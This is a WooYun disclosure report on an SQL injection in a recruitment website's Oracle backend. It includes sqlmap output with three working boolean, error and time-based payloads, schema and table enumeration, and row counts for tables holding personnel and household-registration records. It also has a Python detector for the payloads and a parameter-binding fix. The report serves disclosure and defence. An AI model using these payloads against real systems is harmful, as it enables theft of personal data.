
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0148996

Title: SQL injection in a talent/recruitment website (exposes over ten million records: 600,000 user accounts, 80,000 personnel files, household-registration and HR records, and more)

Related vendor: CNCERT (National Internet Emergency Center)

Author: 路人甲

Submitted: 2015-10-23 23:29

Fixed: 2015-12-11 16:32

Published: 2015-12-11 16:32

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 17

Status: handed to a third-party partner organisation (CNCERT) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-10-23: details sent to the vendor, awaiting vendor handling
2015-10-27: vendor confirmed; details visible to the vendor only
2015-11-06: details opened to core white hats and domain experts
2015-11-16: details opened to regular white hats
2015-11-26: details opened to intern white hats
2015-12-11: details opened to the public

Brief description:

See title.

Details:

SQL injection in a talent website (exposes over ten million records: 600,000 user accounts, 80,000 personnel files, household-registration and HR records, and more).
On top of that, a large volume of résumés and other recruitment data is exposed.
Injection URL: http://**.**.**.**/schools/graduate_college.jsp?school_no=3641
In total: 3 sites, 22 databases, 230 tables.

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: school_no
Type: boolean-based blind
Title: Oracle boolean-based blind - Parameter replace (original value)
Payload: school_no=(SELECT (CASE WHEN (1571=1571) THEN 3641 ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: school_no=3641 AND 8372=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(111)||CHR(108)||CHR(104)||CHR(58)||(SELECT (CASE WHEN (8372=8372) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(103)||CHR(117)||CHR(101)||CHR(58)||CHR(62))) FROM DUAL)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: school_no=3641 AND 2595=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(110)||CHR(122)||CHR(118),5)
---
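The three payloads build their string literals out of Oracle CHR() concatenations, which hides the sqlmap markers (the `<:olh:` / `:gue:>` wrapper of the error-based probe, the `lnzv` pipe name of the time-based probe) from a casual look at the access log. The Python below is an added illustration, not part of the original report or of the site's code: it decodes such payloads and labels them by technique over a few constructed query strings (the three injection payloads are the ones sqlmap listed above; the first line is a benign request). The signature regexes and the handling of the `school_no` parameter are assumptions made for this example, not a description of the site.

```python
import re

# Constructed sample: query strings of four requests to graduate_college.jsp.
# Line 1 is a benign request; lines 2-4 are the three payloads sqlmap reported.
SAMPLE_QUERIES = [
    "school_no=3641",
    "school_no=(SELECT (CASE WHEN (1571=1571) THEN 3641 ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)",
    "school_no=3641 AND 8372=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(111)||CHR(108)||CHR(104)"
    "||CHR(58)||(SELECT (CASE WHEN (8372=8372) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(103)"
    "||CHR(117)||CHR(101)||CHR(58)||CHR(62))) FROM DUAL)",
    "school_no=3641 AND 2595=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(110)||CHR(122)||CHR(118),5)",
]

# A run of CHR(n)||CHR(m)||... builds one string literal character by character.
CHR_RUN = re.compile(r"CHR\(\d+\)(?:\s*\|\|\s*CHR\(\d+\))*", re.IGNORECASE)

# Oracle-specific signatures (assumed for this example). Order matters: the
# error-based payload also carries the CASE WHEN that marks a boolean probe.
SIGNATURES = [
    ("time-based blind", re.compile(r"DBMS_PIPE\.RECEIVE_MESSAGE|DBMS_LOCK\.SLEEP", re.IGNORECASE)),
    ("error-based", re.compile(r"XMLTYPE\(|UTL_INADDR\.|CTXSYS\.DRITHSX", re.IGNORECASE)),
    ("boolean-based blind", re.compile(r"CASE\s+WHEN|\b(?:AND|OR)\s+\d+=\d+", re.IGNORECASE)),
]


def decode_chr(sql):
    """Replace every CHR() concatenation run with the quoted literal it produces."""
    def to_literal(match):
        codes = re.findall(r"CHR\((\d+)\)", match.group(0), re.IGNORECASE)
        return "'" + "".join(chr(int(c)) for c in codes) + "'"
    return CHR_RUN.sub(to_literal, sql)


def classify(value):
    """Name the injection technique a parameter value resembles, or None if clean."""
    decoded = decode_chr(value)
    for technique, pattern in SIGNATURES:
        if pattern.search(decoded):
            return technique
    return None


def scan(queries, param="school_no"):
    """Return (raw value, decoded value, technique) for every request whose
    `param` is not a plain integer; plain-integer requests are ignored."""
    findings = []
    for query in queries:
        for pair in query.split("&"):
            name, _, value = pair.partition("=")
            if name != param or re.fullmatch(r"\d{1,9}", value):
                continue
            findings.append((value, decode_chr(value), classify(value)))
    return findings


if __name__ == "__main__":
    for raw, decoded, technique in scan(SAMPLE_QUERIES):
        print(f"{technique or 'unclassified'}: {decoded}")
```

Decoding before matching is the point: a rule that only looks for `XMLType(` or `DBMS_PIPE` catches these three, but the `<:olh:`/`:gue:>` marker and the pipe name only become visible after the CHR() runs are folded back into literals, and that is what lets an analyst tell a sqlmap session from a hand-written probe.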
[20:27:48] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
available databases [22]:
[*] APEX_030200
[*] APPQOSSYS
[*] CDPX
[*] CORE
[*] CSRC
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TEST
[*] WMSYS
[*] XDB
database management system users [35]:
[*] ANONYMOUS
[*] APEX_030200
[*] APEX_PUBLIC_USER
[*] APPQOSSYS
[*] CDPX
[*] CORE
[*] CSRC
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] EXFSYS
[*] FLOWS_FILES
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDDATA
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] OWBSYS_AUDIT
[*] SCOTT
[*] SI_INFORMTN_SCHEMA
[*] SPATIAL_CSW_ADMIN_USR
[*] SPATIAL_WFS_ADMIN_USR
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TEST
[*] WLS
[*] WMSYS
[*] XDB
[*] XS$NULL
current user: 'CSRC'
current schema (equivalent to database on Oracle): 'CSRC'
the SQL query used returns 10450058 entries
Database: CSRC
[230 tables]
+-----------------------+
| 增量同步猎头简历$_TEMP |
| 招聘会增量更新$_TEMP |
| 猎头简历增量更新$_TEMP |
| 简历增量更新$_TEMP |
| 网络招聘增量更新$_TEMP |
| 资讯信息增量更新$_TEMP |
| AB01 |
| AC01 |
| AD_AUTO |
| AD_STAT |
| AD_TRACER |
| ALIPAY |
| APPLYLOG |
| APPLY_FUNC_TMP |
| APPLY_FUNC_TMP_2 |
| BST_DEPARTMENT |
| BST_DEP_REL |
| CB01 |
| CB15 |
| CC01 |
| CC02 |
| CC05 |
| CC09 |
| CC10 |
| CC21 |
| COMPANY |
| COMPANY_BACKUP |
| C_AD |
| C_ASSIGN |
| C_ATTACHMENT |
| C_ATTACHMENT_HISTORY |
| C_CONTACT |
| C_CUSTOM |
| C_ENGLISH |
| C_FAVORITE |
| C_FAVORITE_TYPE |
| C_FEE_HISTORY |
| C_INTEGRAL |
| C_LOGON_LOG |
| C_OPERATE_LOG |
| C_OP_LOG |
| C_PICTURE |
| C_REPLY |
| C_RESUME_LOG |
| C_TRACER |
| DEPARTMENT |
| DIC_DEGREE |
| DIC_EMPNUM |
| DIC_FIELD |
| DIC_FUNC |
| DIC_FUNC_CATEGORY |
| DIC_FUND |
| DIC_H_CLIENT |
| DIC_H_COOPERATE |
| DIC_H_INDUSTRY |
| DIC_H_PACT_TMPL |
| DIC_H_PROPERTY |
| DIC_H_REGION |
| DIC_INDUSTRY |
| DIC_LANGUAGE |
| DIC_LEVEL |
| DIC_LICENSE_TYPE |
| DIC_LOC_CS |
| DIC_MEMBER_TYPE |
| DIC_PROPERTY |
| DIC_REGION |
| DIC_REGION_CS |
| DIC_SALARY |
| DIC_SCHOOL_KIND |
| DIC_SCHOOL_PROPERTY |
| DIC_TALENT_TYPE |
| DIC_TITLE |
| DS_TMP_WLS_USER |
| DS_WZ_C_PICTURE |
| D_AAC005 |
| D_AAC009 |
| D_AAC011 |
| D_ACA111 |
| D_DCC008 |
| ELE_PHOTO |
| FAIR_APPLY_LOG |
| FAIR_APPLY_STALL |
| FAIR_FEEDBACK |
| FAIR_LOC |
| FAIR_RECRUIT |
| FEEDBACK |
| FEEDBACK2 |
| GLOBAL_USER |
| H_APPLYLOG |
| H_APPRAISE |
| H_ATTACHMENT |
| H_ATTACHMENT_P |
| H_CANDIDATE |
| H_CANDIDATE_BK |
| H_CHANGE |
| H_COMMEND |
| H_COMPANY |
| H_COMPANY_BK |
| H_C_EDUC |
| H_C_EDUC_BK |
| H_C_EXP |
| H_C_EXP_BK |
| H_C_TAG |
| H_DEL_LOG |
| H_DESCRIPT |
| H_EMAIL |
| H_FEEDBACK |
| H_FEEDBACK2 |
| H_FEEDBACK_OL |
| H_INV |
| H_LOG |
| H_MESSAGE |
| H_PACT2 |
| H_PAYLOG |
| H_PHOTO |
| H_RECOMMEND |
| H_RECRUIT |
| H_RECRUITLOG |
| H_R_EDUC |
| H_R_EXP |
| H_SERVICE |
| H_TEXT |
| INFO |
| INFO_BK |
| INFO_GROUP |
| INFO_REPLY |
| INFO_SEND |
| INFO_SEND_LOG |
| INVEST |
| JA0A |
| JOB168E |
| JOB168E_REPLY |
| JOB168E_TMP |
| JOB168E_TMP2 |
| JOB168E_TMP3 |
| JOB_FAIR |
| MAP2011_FUNC |
| MDAEMON |
| MEMBERFEE |
| MEMBERFEE_BK |
| MEMBER_GROUP |
| NEWSPAPER_BOARD |
| NEWSPAPER_DETAIL |
| PERSON |
| PERSON_BACKUP |
| PHOTO |
| P_CERT |
| P_CUSTOM |
| P_EDUC |
| P_ELE |
| P_ENGLISH |
| P_ETCSVC |
| P_EXP |
| P_EXT_FEE |
| P_FAVORITE |
| P_FEE_HISTORY |
| P_LOGON_LOG |
| P_OPERATE_LOG |
| P_OTHER |
| P_PROJ |
| P_RECOM |
| P_RECRUIT_LOG |
| P_SCHOOL |
| P_TEXT |
| P_TRACER |
| P_VOL |
| QA |
| QXM_CONNECTS |
| QXM_PROCESS |
| RC_TMP |
| REAL_DEGREE |
| REAL_MOBILE |
| REAL_NAME |
| RECRUIT |
| RECRUITLOG |
| RECRUIT_APPLY_RELATED |
| RECRUIT_BK |
| RECRUIT_CATALOG |
| RECRUIT_RECYCLED |
| REMIND_GROUP |
| REMIND_SEND |
| REMIND_SEND_LOG |
| RESUMEOUT_LOG |
| SCHOOL |
| SCHOOL_FIELD |
| SCHOOL_INFO |
| SCHOOL_MEMBER_FEE |
| SCHOOL_PAYMENTLOG |
| SCHOOL_PERSON |
| SCHOOL_PHOTO |
| SCHOOL_RECRUITLOG |
| SCHOOL_REQ |
| SCHOOL_STUDINFO |
| SMS_MO |
| SMS_NUMBER |
| SMS_REQUIREMENT |
| SMS_TRACER |
| SUB_COMPANY |
| S_CUSTOM |
| S_FAVORITE |
| S_RECRUITMENT |
| S_SIGNUP |
| TENPAY |
| TMP1_PERSON |
| TMP_CC05 |
| TMP_DUL_NAME |
| TMP_WLS_USER |
| USER_GROUP |
| VALID_HIRE |
| VALID_JOBHUNT |
| WLS_CONFIG |
| WLS_DANGAN |
| WLS_DIAOCHA |
| WLS_DIAOCHA_STEP |
| WLS_GRADUATEINFO |
| WLS_HUJIGUANLI |
| WLS_LAIFANTONGJI |
| WLS_LOGSYS |
| WLS_MESSAGE |
| WLS_MESSAGE_RE |
| WLS_NEWS |
| WLS_NEWSTYPE |
| WLS_NEWSTYPE_BAK |
| WLS_NEWS_BAK |
| WLS_PICTURE |
| WLS_RENSHIYEWU |
| WLS_ROLE |
| WLS_USER |
| WZ_AD_AUTO |
| WZ_C_PICTURE |
+-----------------------+
Row counts per table are listed in full under "Proof of vulnerability" below; the personnel-file table WLS_DANGAN alone holds 87794 entries:
Database: CSRC
Table: WLS_DANGAN
[21 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| BEIZHU | VARCHAR2 |
| BIANHAO | VARCHAR2 |
| CHUSHENGNIANYUE | VARCHAR2 |
| CREATETIME | NUMBER |
| DIANHUA | VARCHAR2 |
| DIZHI | VARCHAR2 |
| ID | NUMBER |
| JIEDANGREN | VARCHAR2 |
| JIEDANGSHIJIAN | VARCHAR2 |
| LAIDANDIANWEI | VARCHAR2 |
| LAIDANSHIJIAN | VARCHAR2 |
| MOD_USER_ID | NUMBER |
| MODTIME | NUMBER |
| QUXIANG | VARCHAR2 |
| USER_ID | NUMBER |
| XINGBIE | VARCHAR2 |
| XINGMING | VARCHAR2 |
| XUELI | VARCHAR2 |
| YUAN_ID | NUMBER |
| YUANKU | VARCHAR2 |
| ZUZHIGUANXI | VARCHAR2 |
+-----------------+----------+
The column names are pinyin for the personal-file fields: XINGMING (name), XINGBIE (sex), CHUSHENGNIANYUE (date of birth), DIANHUA (telephone), DIZHI (address), XUELI (education level), BIANHAO (file number), ZUZHIGUANXI (organisational affiliation), YUANKU (originating archive), LAIDANDIANWEI/LAIDANSHIJIAN (sending unit/time), JIEDANGREN/JIEDANGSHIJIAN (receiving person/time), QUXIANG (destination), BEIZHU (remarks). Together with WLS_HUJIGUANLI (household registration) and WLS_RENSHIYEWU (HR business) this is identity-level personal data, not just recruitment listings.




Proof of vulnerability:

There is too much data, so I did not dump it.

Database: CSRC
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| P_RECRUIT_LOG | 10450058 |
| AD_TRACER | 6523122 |
| C_RESUME_LOG | 3882789 |
| CC01 | 3531502 |
| CC05 | 2827002 |
| P_OPERATE_LOG | 2809807 |
| CC09 | 2733742 |
| AC01 | 2381245 |
| APPLYLOG | 2022730 |
| P_LOGON_LOG | 1849050 |
| CC10 | 1727270 |
| CC02 | 1554993 |
| QXM_CONNECTS | 1528937 |
| CC21 | 1484431 |
| CB01 | 687316 |
| WLS_LAIFANTONGJI | 564631 |
| C_LOGON_LOG | 537863 |
| C_TRACER | 353621 |
| P_EXP | 304025 |
| GLOBAL_USER | 283218 |
| PERSON | 273484 |
| P_TEXT | 235395 |
| C_OPERATE_LOG | 229954 |
| P_EDUC | 216274 |
| RECRUIT_APPLY_RELATED | 98289 |
| WLS_DANGAN | 87794 |
| QXM_PROCESS | 78536 |
| APPLY_FUNC_TMP | 73921 |
| RECRUIT_RECYCLED | 55248 |
| P_FAVORITE | 45990 |
| CB15 | 45423 |
| C_OP_LOG | 44400 |
| RECRUIT | 42968 |
| AB01 | 36923 |
| RECRUIT_BK | 30524 |
| C_FAVORITE | 22998 |
| FAIR_APPLY_LOG | 21824 |
| FAIR_RECRUIT | 21478 |
| FAIR_APPLY_STALL | 19185 |
| PHOTO | 17961 |
| H_C_EXP | 17239 |
| AD_STAT | 16634 |
| VALID_JOBHUNT | 15857 |
| RECRUITLOG | 12159 |
| COMPANY | 9126 |
| COMPANY_BACKUP | 8177 |
| H_CANDIDATE | 8156 |
| MEMBERFEE_BK | 8026 |
| H_CHANGE | 7450 |
| H_C_EDUC | 7263 |
| SMS_TRACER | 6116 |
| APPLY_FUNC_TMP_2 | 5142 |
| MEMBERFEE | 4651 |
| WLS_HUJIGUANLI | 3880 |
| INFO | 3842 |
| H_C_EXP_BK | 3529 |
| C_INTEGRAL | 3330 |
| H_CANDIDATE_BK | 3125 |
| P_ENGLISH | 2801 |
| P_CUSTOM | 2780 |
| REAL_NAME | 2652 |
| ELE_PHOTO | 2395 |
| C_CUSTOM | 2394 |
| WLS_NEWS | 1976 |
| P_VOL | 1935 |
| WLS_LOGSYS | 1876 |
| WLS_NEWS_BAK | 1812 |
| H_APPLYLOG | 1769 |
| H_LOG | 1681 |
| REMIND_SEND_LOG | 1623 |
| INFO_SEND_LOG | 1617 |
| NEWSPAPER_DETAIL | 1455 |
| WLS_MESSAGE | 1451 |
| H_C_EDUC_BK | 1406 |
| BST_DEP_REL | 968 |
| C_PICTURE | 962 |
| BST_DEPARTMENT | 943 |
| RESUMEOUT_LOG | 939 |
| WZ_C_PICTURE | 849 |
| WLS_RENSHIYEWU | 830 |
| AD_AUTO | 608 |
| DIC_FUNC | 492 |
| P_SCHOOL | 474 |
| H_TEXT | 464 |
| DIC_REGION | 455 |
| TMP_CC05 | 438 |
| SMS_MO | 429 |
| SCHOOL_FIELD | 422 |
| WZ_AD_AUTO | 416 |
| WLS_PICTURE | 408 |
| D_ACA111 | 348 |
| JOB_FAIR | 330 |
| MAP2011_FUNC | 277 |
| DIC_FIELD | 274 |
| NEWSPAPER_BOARD | 246 |
| RECRUIT_CATALOG | 217 |
| WLS_NEWSTYPE_BAK | 213 |
| WLS_NEWSTYPE | 211 |
| C_FAVORITE_TYPE | 210 |
| FAIR_FEEDBACK | 159 |
| VALID_HIRE | 138 |
| H_RECRUIT | 116 |
| DEPARTMENT | 94 |
| P_RECOM | 91 |
| H_PHOTO | 86 |
| SCHOOL_INFO | 77 |
| FAIR_LOC | 63 |
| SCHOOL | 62 |
| D_AAC005 | 61 |
| C_REPLY | 59 |
| C_AD | 58 |
| P_ELE | 54 |
| JOB168E_TMP | 50 |
| JOB168E_TMP2 | 50 |
| JOB168E_TMP3 | 50 |
| SMS_NUMBER | 41 |
| JA0A | 35 |
| DIC_INDUSTRY | 31 |
| S_RECRUITMENT | 30 |
| DIC_LOC_CS | 27 |
| DIC_REGION_CS | 27 |
| H_COMPANY_BK | 27 |
| SMS_REQUIREMENT | 27 |
| TMP_DUL_NAME | 27 |
| DIC_PROPERTY | 26 |
| H_SERVICE | 20 |
| SCHOOL_PHOTO | 20 |
| SCHOOL_PAYMENTLOG | 15 |
| SCHOOL_MEMBER_FEE | 14 |
| DIC_H_INDUSTRY | 13 |
| D_AAC011 | 11 |
| DIC_FUNC_CATEGORY | 11 |
| DIC_H_CLIENT | 11 |
| H_DEL_LOG | 11 |
| DIC_SALARY | 10 |
| RC_TMP | 9 |
| TMP1_PERSON | 9 |
| D_AAC009 | 8 |
| DIC_LANGUAGE | 8 |
| TMP_WLS_USER | 8 |
| DIC_DEGREE | 7 |
| DIC_LICENSE_TYPE | 7 |
| DIC_EMPNUM | 6 |
| DIC_H_PROPERTY | 6 |
| DIC_TALENT_TYPE | 6 |
| D_DCC008 | 5 |
| DIC_FUND | 5 |
| DIC_LEVEL | 5 |
| H_FEEDBACK_OL | 5 |
| REMIND_SEND | 5 |
| DIC_H_REGION | 4 |
| DIC_SCHOOL_KIND | 4 |
| DIC_TITLE | 4 |
| DIC_H_COOPERATE | 3 |
| H_DESCRIPT | 3 |
| INFO_SEND | 3 |
| REMIND_GROUP | 3 |
| USER_GROUP | 3 |
| DIC_SCHOOL_PROPERTY | 2 |
| INFO_GROUP | 2 |
| MDAEMON | 2 |
| MEMBER_GROUP | 2 |
| WLS_ROLE | 2 |
| WLS_USER | 2 |
| DIC_H_PACT_TMPL | 1 |
| DIC_MEMBER_TYPE | 1 |
| SUB_COMPANY | 1 |
| WLS_MESSAGE_RE | 1 |
+-----------------------+---------+




That's all.

Fix:

Filter the input. Concretely: treat school_no as an integer (reject any value that is not a plain number) and bind it as a query parameter (a JDBC PreparedStatement in JSP) instead of concatenating it into the SQL string. Stripping characters from the value is not by itself a sufficient fix.
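To make "filter" concrete, the Python below is an added example (not the site's code, which is JSP on Oracle) that puts the vulnerable concatenation pattern behind graduate_college.jsp beside a hardened version. It uses an in-memory SQLite table as a stand-in for the Oracle CSRC schema, so the probes are the simple `AND 1=1` / `AND 1=2` / `OR 1=1` forms rather than the DUAL-based Oracle payload above; the table and column names are constructed for the example. The JDBC equivalent of the hardened function is `prepareStatement("... WHERE school_no = ?")` followed by `setInt(1, n)`.

```python
import re
import sqlite3


def make_db():
    """Constructed stand-in for the CSRC schema: two schools in an in-memory SQLite table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE school (school_no INTEGER PRIMARY KEY, name TEXT)")
    con.executemany("INSERT INTO school VALUES (?, ?)",
                    [(3641, "School A"), (3642, "School B")])
    return con


def graduate_college_vulnerable(con, school_no):
    """The pattern behind graduate_college.jsp?school_no=...: the raw parameter is
    pasted into the SQL text, so 'AND 1=2' or 'OR 1=1' rewrites the WHERE clause."""
    sql = "SELECT name FROM school WHERE school_no = " + school_no
    return [row[0] for row in con.execute(sql)]


def graduate_college_hardened(con, school_no):
    """Type-check first, then bind: the value reaches the database as data, never as SQL."""
    if not re.fullmatch(r"\d{1,9}", school_no):
        raise ValueError("school_no must be a positive integer")
    sql = "SELECT name FROM school WHERE school_no = ?"
    return [row[0] for row in con.execute(sql, (int(school_no),))]


def hardened_rejects(con, school_no):
    """True when the hardened lookup refuses the value instead of querying with it."""
    try:
        graduate_college_hardened(con, school_no)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    con = make_db()
    for probe in ("3641", "3641 AND 1=1", "3641 AND 1=2", "0 OR 1=1"):
        print(probe, "->", graduate_college_vulnerable(con, probe),
              "| hardened rejects:", hardened_rejects(con, probe))
```

The vulnerable function answers the attacker's true/false questions (one row for `AND 1=1`, none for `AND 1=2`, every row for `OR 1=1`), which is exactly the oracle a boolean-blind extraction needs; the hardened one never lets the value participate in parsing, so the same strings are refused before any query runs.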

Copyright notice: when reposting, credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 10

Confirmed: 2015-10-27 16:30

Vendor reply:

CNVD has confirmed and reproduced the described issue; it has been forwarded via CNCERT to the Jiangsu branch centre, which will coordinate handling with the website's operating unit.

Latest status:

None